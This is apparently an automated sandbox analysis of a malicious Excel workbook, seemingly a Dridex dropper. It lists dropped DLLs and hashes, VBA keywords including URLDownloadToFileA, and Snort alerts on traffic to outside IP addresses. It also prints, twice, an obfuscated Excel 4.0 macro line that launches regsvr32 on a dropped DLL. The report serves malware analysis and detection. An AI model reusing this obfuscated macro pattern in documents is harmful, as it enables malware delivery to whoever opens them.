                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):58936
                                                                                Entropy (8bit):7.994797855729196
                                                                                Encrypted:true
                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                Malicious:false
                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):241332
                                                                                Entropy (8bit):4.206824555297794
                                                                                Encrypted:false
                                                                                SSDEEP:1536:cGtLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:ckNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                MD5:A66589E6EA76694010E643B83536ECDD
                                                                                SHA1:F546989B665D046F2F3E3A2D875F8BF788F4CD5C
                                                                                SHA-256:65E8323065EBA93550158F3CE48104DF6ECF862C1A0BDE65845EB45443A05DD5
                                                                                SHA-512:D14EFFE1F02C96D7A9A3F6C38DE4CCF26464D88A319AD3A583126DE8AF2BC9CCB3218B34D943ECE3C02FD6BD39BCF9FA51AD9F4D02806F9C7423062B3D6B3BDE
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\TarF78A.tmp
                                                                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):152533
                                                                                Entropy (8bit):6.31602258454967
                                                                                Encrypted:false
                                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\ogsit.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):765440
                                                                                Entropy (8bit):6.0875108403853675
                                                                                Encrypted:false
                                                                                SSDEEP:12288:F0q2AejP0XbOAQ60af2rDMmUz0x07wGwefo5SuDwadeUy:i2ejIOU0G2rDMmxxkRTs9y
                                                                                MD5:92AA183E338E9F7BBDC9CA401EB97C64
                                                                                SHA1:E45D05BF840341FBAA6FD6B9F396788C5810CB26
                                                                                SHA-256:791252FC4DEF3C4C3BDB270633FFC88C0E2CD8E8E8BA299825A83841A273E7DD
                                                                                SHA-512:EB08528C5E3DD47AE6DDC6F79BC7BBD035701F46B0845D5A90015E3FBA77634E614BB866C6EDA9F0AEC9ED06D8344B038EA56635A7214F2378D3F73B72EF2998
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 20 23:12:58 2021, atime=Wed Jan 20 23:12:58 2021, length=8192, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):867
                                                                                Entropy (8bit):4.4701762248053525
                                                                                Encrypted:false
                                                                                SSDEEP:12:85QICLgXg/XAlCPCHaXtB8XzB/o5XX+WnicvbSubDtZ3YilMMEpxRljK1TdJP9TK:85XU/XTd6j0YepDv3qgrNru/
                                                                                MD5:3933849A927739A691EE3ABD3BBBB95D
                                                                                SHA1:943DD4894158B482D53A940A162FA2DC59A351B3
                                                                                SHA-256:25FDCCF8A999E3DC5F16540CE62CDA7A82B8CAF9ACFA19392B6B5B2223583998
                                                                                SHA-512:D80229BEBE765E6045503AA08338151E599E4BF7387F584F7E6BA655F1B2DD0A2FB04FA72D5A4DA34D33D50ADCA070C257F932BB55A796F3057DC87FC446A22A
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):178
                                                                                Entropy (8bit):4.633981770780864
                                                                                Encrypted:false
                                                                                SSDEEP:3:oyBVomxWecl/FlWiL62p/sp6lN6R/FlWiL62p/sp6lmxWecl/FlWiL62p/sp6lv:dj2b6cf0b6cZb6c1
                                                                                MD5:52C875172872C1E86ABB927887F3BE55
                                                                                SHA1:CD9498C7F86EE30388E4B62A832ADF11439F7039
                                                                                SHA-256:C1B02934C56DD0E6888523993318D5C76FC502CE2C73D429B1F8EAD4F863F8DA
                                                                                SHA-512:2C4B1734CB6F47D09E6386D9C2F2C4E8B3A5D91A6016290E6A1A5544BB50E4AE8F743E308517582B94D78DBDFA73356BAE4C82651DE90BD3FF6BEF36227FD34D
                                                                                Malicious:false
                                                                                Preview: Desktop.LNK=0..[misc]..printouts of outstanding as of 01_20_2021.LNK=0..printouts of outstanding as of 01_20_2021.LNK=0..[misc]..printouts of outstanding as of 01_20_2021.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\printouts of outstanding as of 01_20_2021.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Jan 20 23:12:58 2021, atime=Wed Jan 20 23:13:00 2021, length=54601, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2348
                                                                                Entropy (8bit):4.555912068249222
                                                                                Encrypted:false
                                                                                SSDEEP:24:8G5/XTd6jFyqqbe7AIEDv3qgdM7dD2G5/XTd6jFyqqbe7AIEDv3qgdM7dV:8e/XT0jF5OggQh2e/XT0jF5OggQ/
                                                                                MD5:D20893AB2B73DFFB6F117A54835CA1E0
                                                                                SHA1:AFCF9C0192F99411AA62831CFC9FFF1D7031571E
                                                                                SHA-256:1EA247C062A7554D42366FFF7CC0EFED238DF175E4FE1DEC1C1724787336B219
                                                                                SHA-512:6D2B787F5B2F6C2185757C6196A13568C3A4F8C5CB3073F8F84CFAA88563FB5212642D889E56E97CCD1F33DCCD95F75B915AF198D241663602CC018DA6C0FC21
                                                                                Malicious:false
                                                                                C:\Users\user\Desktop\EC1F0000
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):54601
                                                                                Entropy (8bit):7.811133847012313
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Xp7MJ+BqkDpBIsqBJGu+2Ug5M9PF9sqcB99O3:Xps0xDplKIu3UBTC9A
                                                                                MD5:35A9FDF89660390F074B71D0AC45BBA1
                                                                                SHA1:B50EF4640F3D9B2FA027C2736F22B632AC143DD9
                                                                                SHA-256:F27EBDF0CFE9FD8917A6D2495C6F8C7BE8C991B9F922970955E81804553886BD
                                                                                SHA-512:43C5C846473416EF77CA713E43A734D866F42CCBEADDD3D66972C95B732448158ED8BB7202C243DF55A7A6FE24ABE28838D6B8453E0F84D0138E95E581C51DFE
                                                                                Malicious:false
                                                                                C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):330
                                                                                Entropy (8bit):1.4377382811115937
                                                                                Encrypted:false
                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                Malicious:true
                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                Static File Info

                                                                                General

                                                                                File type:Microsoft Excel 2007+
                                                                                Entropy (8bit):7.676195161958508
                                                                                TrID:
                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                File name:printouts of outstanding as of 01_20_2021.xlsm
                                                                                File size:38038
                                                                                MD5:28e9c78dcffb4a80c7bcfcd818791940
                                                                                SHA1:0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
                                                                                SHA256:09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772
                                                                                SHA512:082d84c5d6b4442f0c6d10231c0368e74906a62348aaf7bb070a602695f9420abc3aa2cce28dfeaaaae784ba7e96a8008ab9e9d5bd6f2a5dfb591e8c8f5729fc
                                                                                SSDEEP:768:IxPLv4xxXRG9HR4sjVpVNsz/LaR+ZUmlmWPwkGq/gR9uVQ4:aPb4xxXizgu+ZMFq/gR9M

                                                                                File Icon

                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                Static OLE Info

                                                                                General

                                                                                Document Type:OpenXML
                                                                                Number of OLE Files:2

                                                                                OLE File "/opt/package/joesandbox/database/analysis/342170/sample/printouts of outstanding as of 01_20_2021.xlsm"

                                                                                Indicators

                                                                                Has Summary Info:False
                                                                                Application Name:unknown
                                                                                Encrypted Document:False
                                                                                Contains Word Document Stream:
                                                                                Contains Workbook/Book Stream:
                                                                                Contains PowerPoint Document Stream:
                                                                                Contains Visio Document Stream:
                                                                                Contains ObjectPool Stream:
                                                                                Flash Objects Count:
                                                                                Contains VBA Macros:True

                                                                                Summary

                                                                                Author:msc.com
                                                                                Last Saved By:
                                                                                Create Time:2021-01-20T10:44:11Z
                                                                                Last Saved Time:2021-01-20T11:03:27Z
                                                                                Security:0

                                                                                Document Summary

                                                                                Thumbnail Scaling Desired:false
                                                                                Company:
                                                                                Contains Dirty Links:false
                                                                                Shared Document:false
                                                                                Changed Hyperlinks:false
                                                                                Application Version:16.0300

                                                                                Streams with VBA

                                                                                VBA File Name: Module1.bas, Stream Size: 5186
                                                                                General
                                                                                Stream Path:VBA/Module1
                                                                                VBA File Name:Module1.bas
                                                                                Stream Size:5186
                                                                                Data ASCII:. . . . . $ . . . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . 2 . . . . . . . . . . . . . . . . . . 4 . . . . . D . . . . . . . . < . . . . . . . . . . . . . . . . . . . U R L D o w n l o a d T o F i l e A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                #Else
                                                                                "urlmon"
                                                                                Resume
                                                                                fillename
                                                                                Randomize:
                                                                                Ada(u)
                                                                                Long,
                                                                                "mo")
                                                                                ol).value
                                                                                hokkkk(s,
                                                                                redline(ellysio))
                                                                                PtrSafe
                                                                                Declare
                                                                                Next:
                                                                                dwReserved
                                                                                Rnd))
                                                                                String,
                                                                                sb_t()
                                                                                pCaller
                                                                                String
                                                                                Sheets(s).UsedRange.SpecialCells(xlCellTypeConstants):
                                                                                ol).Name
                                                                                Split(govs,
                                                                                "="):
                                                                                "forsS_"
                                                                                directoo
                                                                                Split(kij(ol),
                                                                                LongPtr,
                                                                                redline
                                                                                Sheets(ol).Cells(aa,
                                                                                homedep
                                                                                ellysio
                                                                                Integer:
                                                                                ByVal
                                                                                P_Click_Box
                                                                                redline(Oa))),
                                                                                redline(yel
                                                                                Integer)
                                                                                ellysio()
                                                                                Split(StrConv(m,
                                                                                Sheets(ol).Cells(ellysio,
                                                                                "URLDownloadToFileA"
                                                                                Integer
                                                                                gogog()
                                                                                nimo(Int((UBound(nimo)
                                                                                Error
                                                                                UBound(Ada)
                                                                                Attribute
                                                                                LBound(Ada)
                                                                                szURL
                                                                                VB_Name
                                                                                fillename,
                                                                                gogog
                                                                                Function
                                                                                "mo":
                                                                                szFileName
                                                                                LongPtr
                                                                                homedep(nimo
                                                                                lpfnCB
                                                                                Alias
                                                                                Variant)
                                                                                Private
                                                                                hokkkk
                                                                                VBA Code
                                                                                VBA File Name: Sheet1.cls, Stream Size: 1479
                                                                                General
                                                                                Stream Path:VBA/Sheet1
                                                                                VBA File Name:Sheet1.cls
                                                                                Stream Size:1479
                                                                                Data ASCII:. . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . v b o x 1 _ c l i , 1 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . .

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                VB_Exposed
                                                                                Frame"
                                                                                VB_Customizable
                                                                                VB_Control
                                                                                VB_TemplateDerived
                                                                                MSForms,
                                                                                False
                                                                                Attribute
                                                                                Private
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VBA Code
                                                                                VBA File Name: Sheet2.cls, Stream Size: 991
                                                                                General
                                                                                Stream Path:VBA/Sheet2
                                                                                VBA File Name:Sheet2.cls
                                                                                Stream Size:991

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                False
                                                                                VB_Exposed
                                                                                Attribute
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VB_Customizable
                                                                                VB_TemplateDerived
                                                                                VBA Code
                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                General
                                                                                Stream Path:VBA/ThisWorkbook
                                                                                VBA File Name:ThisWorkbook.cls
                                                                                Stream Size:999

                                                                                VBA Code Keywords

                                                                                Keyword
                                                                                False
                                                                                VB_Exposed
                                                                                Attribute
                                                                                VB_Name
                                                                                VB_Creatable
                                                                                "ThisWorkbook"
                                                                                VB_PredeclaredId
                                                                                VB_GlobalNameSpace
                                                                                VB_Base
                                                                                VB_Customizable
                                                                                VB_TemplateDerived
                                                                                VBA Code

                                                                                Streams

                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 605
                                                                                General
                                                                                Stream Path:PROJECT
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Stream Size:605
                                                                                Entropy:5.19808364053
                                                                                Base64 Encoded:True
                                                                                Data ASCII:I D = " { 3 8 C 1 2 A 0 A - E 6 4 8 - 4 6 4 5 - A 7 B 8 - E 6 2 A B D C 4 2 5 E 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 5 0 7 E 1 E B E 1 E F E 5 E F E 5 E F E 5 E F E 5 " . .
                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 107
                                                                                General
                                                                                Stream Path:PROJECTwm
                                                                                File Type:data
                                                                                Stream Size:107
                                                                                Entropy:3.24742544165
                                                                                Base64 Encoded:False
                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3838
                                                                                General
                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                File Type:data
                                                                                Stream Size:3838
                                                                                Entropy:4.51887827492
                                                                                Base64 Encoded:False
                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2390
                                                                                General
                                                                                Stream Path:VBA/__SRP_0
                                                                                File Type:data
                                                                                Stream Size:2390
                                                                                Entropy:3.38572227344
                                                                                Base64 Encoded:False
                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 347
                                                                                General
                                                                                Stream Path:VBA/__SRP_1
                                                                                File Type:data
                                                                                Stream Size:347
                                                                                Entropy:2.5800525623
                                                                                Base64 Encoded:False
                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p C a l l e r . . . . . . . . . . . . . . . . s z U R L . . . . . . . . . . . . . . . . s z F i l e N a m e . . . . . . . . . . . . . . . . d w R e s e r v e d . . . . . . . . . . . . . . . . l p f n C B . . . . . . . . . . . . . . . .
                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 505
                                                                                General
                                                                                Stream Path:VBA/__SRP_2
                                                                                File Type:data
                                                                                Stream Size:505
                                                                                Entropy:2.4067697489
                                                                                Base64 Encoded:False
                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 696
                                                                                General
                                                                                Stream Path:VBA/__SRP_3
                                                                                File Type:data
                                                                                Stream Size:696
                                                                                Entropy:2.24538637402
                                                                                Base64 Encoded:False
                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 842
                                                                                General
                                                                                Stream Path:VBA/dir
                                                                                File Type:data
                                                                                Stream Size:842
                                                                                Entropy:6.51749232573
                                                                                Base64 Encoded:True
                                                                                Data ASCII:. F . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . I . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -

                                                                                Macro 4.0 Code

                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)
                                                                                
                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",zdkvrlsh.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                OLE File "/opt/package/joesandbox/database/analysis/342170/sample/printouts of outstanding as of 01_20_2021.xlsm"

                                                                                Indicators

                                                                                Has Summary Info:False
                                                                                Application Name:unknown
                                                                                Encrypted Document:False
                                                                                Contains Word Document Stream:
                                                                                Contains Workbook/Book Stream:
                                                                                Contains PowerPoint Document Stream:
                                                                                Contains Visio Document Stream:
                                                                                Contains ObjectPool Stream:
                                                                                Flash Objects Count:
                                                                                Contains VBA Macros:False

                                                                                Summary

                                                                                Author:msc.com
                                                                                Last Saved By:
                                                                                Create Time:2021-01-20T10:44:11Z
                                                                                Last Saved Time:2021-01-20T11:03:27Z
                                                                                Security:0

Document Summary

Thumbnail Scaling Desired: false
Company:
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 16.0300

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 112
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 112
Entropy: 4.6011544911
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: f, File Type: data, Stream Size: 88
General
Stream Path: f
File Type: data
Stream Size: 88
Entropy: 3.36756968706
Base64 Encoded: False
Data ASCII: . . ( . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . 1 . . . . R . . . . . . . . . . . K . Q . . . . . . . . . . . C a l i b r i . . . . . . . . . .
Data Raw: 00 04 28 00 00 0c 1a 08 03 00 00 00 01 00 00 80 ff ff 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 31 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 00 00 00 90 01 ac b6 01 00 07 43 61 6c 69 62 72 69 00 00 00 00 00 00 00 00 00 00

Stream Path: o, File Type: empty, Stream Size: 0
General
Stream Path: o
File Type: empty
Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII:
Data Raw:

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",zdkvrlsh.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                01/20/21-16:15:28.241166TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349302194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:28.428231TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349301211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:29.621223TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:29.621223TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:29.707779TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349304211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:29.940860TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349305194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:30.660328TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349309194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:31.637966TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349310211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:31.983140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:31.983140TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
